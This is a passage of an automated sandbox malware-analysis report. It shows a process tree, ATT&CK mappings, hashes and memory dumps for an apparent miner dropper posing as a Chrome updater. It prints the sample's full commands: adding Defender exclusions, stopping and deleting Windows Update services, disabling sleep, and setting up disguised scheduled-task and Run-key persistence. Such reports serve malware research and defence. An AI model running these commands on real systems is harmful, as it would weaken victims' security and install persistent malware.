    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4828
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2264
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1936
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:4412
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:4604
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:920
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:420
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:3152
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:1848
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:1116
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:1356
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:1228
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4960
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5096
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4396
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4500
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#enulbt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2640
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#hnkopwq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:756
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        5⤵
        
        PID:3772
- - C:\Users\Admin\AppData\Local\Temp\setup23.exe
    "C:\Users\Admin\AppData\Local\Temp\setup23.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4796
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
      4⤵
      Creates scheduled task(s)
      PID:1596
- - C:\Users\Admin\AppData\Local\Temp\watchdog.exe
    "C:\Users\Admin\AppData\Local\Temp\watchdog.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3492
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:99276

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:3920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4368
- C:\Windows\system32\cmd.exe
  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:2208
- - C:\Windows\system32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2632
- - C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4752
- - C:\Windows\system32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2148
- - C:\Windows\system32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5112
- - C:\Windows\system32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3500
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3940
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1844
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:4876
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4872
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:5404
- C:\Windows\system32\cmd.exe
  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1596
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4892
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3496
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3964
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#enulbt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2236
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe otevakyhafsyu
  2⤵
  PID:6108
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    - Drops file in Program Files directory
    PID:6176
- C:\Windows\system32\cmd.exe
  cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:6120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Modifies data under HKEY_USERS
    PID:6188
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe yqrjmnkfkjaccxyl GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1hWwoM0PZStk7+MZIko1cmr6CaSv2J5Lcp2RhMWT5VPZ
  2⤵
  PID:6264

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1796

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
7.1MB

MD5
8c0fbba08bb745c42d267e132a5ccf8b

SHA1
3ca821e61315e786778828447d4a50e9153ac209

SHA256
d8999718d85f8e4737fd3d7879722eb0dc9587e0646783eb1aeb50bde2cbdf59

SHA512
9c4d86fc44432652c1a9e2cf632d4e49a0871dca435da98dbdb0140486f05a046d90ccff3d8f87efce990db80669d10153cda051bdefc4f60bfb85272e1379af

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
7.1MB

MD5
8c0fbba08bb745c42d267e132a5ccf8b

SHA1
3ca821e61315e786778828447d4a50e9153ac209

SHA256
d8999718d85f8e4737fd3d7879722eb0dc9587e0646783eb1aeb50bde2cbdf59

SHA512
9c4d86fc44432652c1a9e2cf632d4e49a0871dca435da98dbdb0140486f05a046d90ccff3d8f87efce990db80669d10153cda051bdefc4f60bfb85272e1379af

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
d6b0775dc8b065f63eb1c316f861073c

SHA1
06053ace4e90b7b5e5ffd5ea60c508757332669a

SHA256
41417649008fbe3872c14d033ea49da0b91898f24030b98f2d587626c3a95d4f

SHA512
1bbf1436625d5a62f58ee44ac7dffa65291c727b6129990e0677edced90489ba051a6a325d99b8a232c532b41e7b4af49423d33a911dfab8ba56a93a5b63876c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
438B

MD5
43a63c066a73439a040bea56950ccfe4

SHA1
7fefb1122e1f30959809ad5d74fe2314aa16c637

SHA256
0212b91acb0e438aefcd3556d6acb6f0156d7ab7b0285d98c94a2a34f036530f

SHA512
15e4500712c547043a5d42d44ba150287f81cc2cc77cf42700ff35390766d47c592a349c2e2d5054f068c4c6a3000906adcf6adc70c4a0f12b0aab3d97ab4962

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bbd5c6ddd5db15aaeb644ffa9dfa55be

SHA1
e76ab9807493db7d72f3a34a3c6be80fc3dfa0cd

SHA256
efe8c5c26584f5e176fc400f6b79493829de64f774807552a6957c3d41718f5e

SHA512
16094ac4ceabc056201c7aacafc8268850b3443da4de69b6bb36b9017432850dbc32a9088e3f834d55553f93dcba22f9bf00a647cff91112e44fe1928013b338

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ab33b7f5e6dc7de4f3ede70e0e988355

SHA1
36353983e9813c769a9c282dcf12a0b7ab786fc2

SHA256
93511bf543ba7157d815caa649d796f0be0eeeb03af3bb032af39f35b8d0335e

SHA512
119de69d7017f0b817da73994b8edfb8c2ee0c6ed4a28b66fdf9f96e7da60f0ad7ab0780a1a74b41fe2e5fef349202b44637cca1610d00eccb6348f2459fc1a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
7.1MB

MD5
d9a08e2b377287b627ceb2df0450899d

SHA1
99c5f7707141e2b048d2e6f3bb7646e726123f25

SHA256
145c38e383cb092c5f4236c44f700c8f43fa06b626386d148f4a5b3b8d2c3fe6

SHA512
8b0192e8641ca965eced430d3d4d525cb749f7b5ee1996ccaa964030ef16b012e66ebdef9ed7d9e0af4207f265f57ac25f8f08824d2c1af6c722b286ef5e954b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
7.1MB

MD5
d9a08e2b377287b627ceb2df0450899d

SHA1
99c5f7707141e2b048d2e6f3bb7646e726123f25

SHA256
145c38e383cb092c5f4236c44f700c8f43fa06b626386d148f4a5b3b8d2c3fe6

SHA512
8b0192e8641ca965eced430d3d4d525cb749f7b5ee1996ccaa964030ef16b012e66ebdef9ed7d9e0af4207f265f57ac25f8f08824d2c1af6c722b286ef5e954b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup23.exe

Filesize
1.3MB

MD5
5164546607112f8e62d25d4894705170

SHA1
8cec1cabfdd23909fa950ab6ff031da5fd6eb570

SHA256
390fd4d6b3b9f91adb35954d7985708a70a6acd08b23d3e00038d08ae1416471

SHA512
d5b95472b99e6a64e5532aa8e47171083dc90731d476ec1447c951126245f788c337e975111b50023e03d43629defc6b08200fc95d49460e85e134be73d65ebb

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup23.exe

Filesize
1.3MB

MD5
5164546607112f8e62d25d4894705170

SHA1
8cec1cabfdd23909fa950ab6ff031da5fd6eb570

SHA256
390fd4d6b3b9f91adb35954d7985708a70a6acd08b23d3e00038d08ae1416471

SHA512
d5b95472b99e6a64e5532aa8e47171083dc90731d476ec1447c951126245f788c337e975111b50023e03d43629defc6b08200fc95d49460e85e134be73d65ebb

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe

Filesize
2.5MB

MD5
735d324569e557ae7d943929e4ff87e9

SHA1
141e0b89202dd8548c01d9ef55b7278222d8126b

SHA256
4a3d5ca3d8e5b2e7a981c95b7229cf9d3de168be21c22b1bbfff1ee21b3b712e

SHA512
db94ecc52a54309f1eccfb0f6f18c92bd0ef4c4849fe5a528f270262ce2929637c74d63d4959b4e4e4c845d926332f6b5fd3b78a82322871d256f7566d6f1bee

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe

Filesize
2.5MB

MD5
735d324569e557ae7d943929e4ff87e9

SHA1
141e0b89202dd8548c01d9ef55b7278222d8126b

SHA256
4a3d5ca3d8e5b2e7a981c95b7229cf9d3de168be21c22b1bbfff1ee21b3b712e

SHA512
db94ecc52a54309f1eccfb0f6f18c92bd0ef4c4849fe5a528f270262ce2929637c74d63d4959b4e4e4c845d926332f6b5fd3b78a82322871d256f7566d6f1bee

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe

Filesize
1.3MB

MD5
5164546607112f8e62d25d4894705170

SHA1
8cec1cabfdd23909fa950ab6ff031da5fd6eb570

SHA256
390fd4d6b3b9f91adb35954d7985708a70a6acd08b23d3e00038d08ae1416471

SHA512
d5b95472b99e6a64e5532aa8e47171083dc90731d476ec1447c951126245f788c337e975111b50023e03d43629defc6b08200fc95d49460e85e134be73d65ebb

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe

Filesize
1.3MB

MD5
5164546607112f8e62d25d4894705170

SHA1
8cec1cabfdd23909fa950ab6ff031da5fd6eb570

SHA256
390fd4d6b3b9f91adb35954d7985708a70a6acd08b23d3e00038d08ae1416471

SHA512
d5b95472b99e6a64e5532aa8e47171083dc90731d476ec1447c951126245f788c337e975111b50023e03d43629defc6b08200fc95d49460e85e134be73d65ebb

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
573d77d4e77a445f5db769812a0be865

SHA1
7473d15ef2d3c6894edefd472f411c8e3209a99c

SHA256
5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c

SHA512
af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
631f4b3792b263fdda6b265e93be4747

SHA1
1d6916097d419198bfdf78530d59d0d9f3e12d45

SHA256
4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976

SHA512
e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
49d9a9869f0cc7c359df1e335969ada2

SHA1
b8a25a1dfe77835063e3296698f74190ed644ce1

SHA256
a66d3134dc2e578edc16b066009d8d4a03be3de23180ea20cf1ad8ecb6d6c787

SHA512
65d260fcc200042152dcd885940f8352f3b20ac0c3eae01ad1d03d2359de280ea58e5a93a11d563939d0fb812605b06caacd556b76b52d368759b4090fc8c5d2

Download Submit
memory/420-269-0x0000000000000000-mapping.dmp

Download
memory/756-308-0x0000000000000000-mapping.dmp

Download
memory/920-268-0x0000000000000000-mapping.dmp

Download
memory/1116-274-0x0000000000000000-mapping.dmp

Download
memory/1228-290-0x0000000000000000-mapping.dmp

Download
memory/1356-282-0x0000000000000000-mapping.dmp

Download
memory/1596-658-0x0000000000000000-mapping.dmp

Download
memory/1596-300-0x0000000000000000-mapping.dmp

Download
memory/1796-379-0x0000000000380000-0x00000000006EE000-memory.dmp

Filesize
3.4MB

Download
memory/1796-389-0x0000000000380000-0x00000000006EE000-memory.dmp

Filesize
3.4MB

Download
memory/1796-512-0x0000000000380000-0x00000000006EE000-memory.dmp

Filesize
3.4MB

Download
memory/1796-499-0x0000000000380000-0x00000000006EE000-memory.dmp

Filesize
3.4MB

Download
memory/1844-684-0x0000000000000000-mapping.dmp

Download
memory/1848-273-0x0000000000000000-mapping.dmp

Download
memory/1936-235-0x0000000000000000-mapping.dmp

Download
memory/2148-670-0x0000000000000000-mapping.dmp

Download
memory/2208-657-0x0000000000000000-mapping.dmp

Download
memory/2236-660-0x0000000000000000-mapping.dmp

Download
memory/2236-907-0x00000220FEE90000-0x00000220FEEAC000-memory.dmp

Filesize
112KB

Download
memory/2236-938-0x00000220FDEB9000-0x00000220FDEBF000-memory.dmp

Filesize
24KB

Download
memory/2264-228-0x0000000000000000-mapping.dmp

Download
memory/2632-661-0x0000000000000000-mapping.dmp

Download
memory/2640-230-0x0000000000000000-mapping.dmp

Download
memory/3152-272-0x0000000000000000-mapping.dmp

Download
memory/3404-683-0x0000000000000000-mapping.dmp

Download
memory/3492-390-0x0000000000000000-mapping.dmp

Download
memory/3496-679-0x0000000000000000-mapping.dmp

Download
memory/3500-680-0x0000000000000000-mapping.dmp

Download
memory/3696-315-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp

Filesize
13.0MB

Download
memory/3696-126-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp

Filesize
13.0MB

Download
memory/3696-124-0x0000000000000000-mapping.dmp

Download
memory/3696-127-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp

Filesize
13.0MB

Download
memory/3696-128-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp

Filesize
13.0MB

Download
memory/3696-129-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp

Filesize
13.0MB

Download
memory/3696-130-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp

Filesize
13.0MB

Download
memory/3696-131-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp

Filesize
13.0MB

Download
memory/3696-147-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/3696-133-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/3696-132-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp

Filesize
13.0MB

Download
memory/3696-134-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp

Filesize
13.0MB

Download
memory/3696-311-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/3772-339-0x0000000000000000-mapping.dmp

Download
memory/3832-120-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/3832-119-0x0000000140003FAC-mapping.dmp

Download
memory/3832-123-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/3832-392-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/3832-122-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/3832-121-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/3832-118-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/3920-497-0x00007FF6C0A60000-0x00007FF6C1759000-memory.dmp

Filesize
13.0MB

Download
memory/3920-346-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/3920-498-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/3920-345-0x00007FF6C0A60000-0x00007FF6C1759000-memory.dmp

Filesize
13.0MB

Download
memory/3920-951-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmp

Filesize
1.9MB

Download
memory/3920-950-0x00007FF6C0A60000-0x00007FF6C1759000-memory.dmp

Filesize
13.0MB

Download
memory/3940-682-0x0000000000000000-mapping.dmp

Download
memory/3964-681-0x0000000000000000-mapping.dmp

Download
memory/4368-500-0x0000000000000000-mapping.dmp

Download
memory/4368-517-0x0000027344BF0000-0x0000027344C0C000-memory.dmp

Filesize
112KB

Download
memory/4368-537-0x000002735E1C0000-0x000002735E279000-memory.dmp

Filesize
740KB

Download
memory/4368-570-0x0000027344C10000-0x0000027344C1A000-memory.dmp

Filesize
40KB

Download
memory/4396-248-0x0000000000000000-mapping.dmp

Download
memory/4412-245-0x0000000000000000-mapping.dmp

Download
memory/4500-258-0x0000000000000000-mapping.dmp

Download
memory/4568-264-0x0000000000000000-mapping.dmp

Download
memory/4604-254-0x0000000000000000-mapping.dmp

Download
memory/4752-664-0x0000000000000000-mapping.dmp

Download
memory/4796-171-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-204-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-246-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-226-0x0000000000D90000-0x00000000010FE000-memory.dmp

Filesize
3.4MB

Download
memory/4796-168-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-243-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-225-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-223-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-240-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-221-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-220-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-135-0x0000000000000000-mapping.dmp

Download
memory/4796-218-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-217-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-216-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-215-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-214-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-302-0x0000000000D90000-0x00000000010FE000-memory.dmp

Filesize
3.4MB

Download
memory/4796-213-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-212-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/4796-211-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
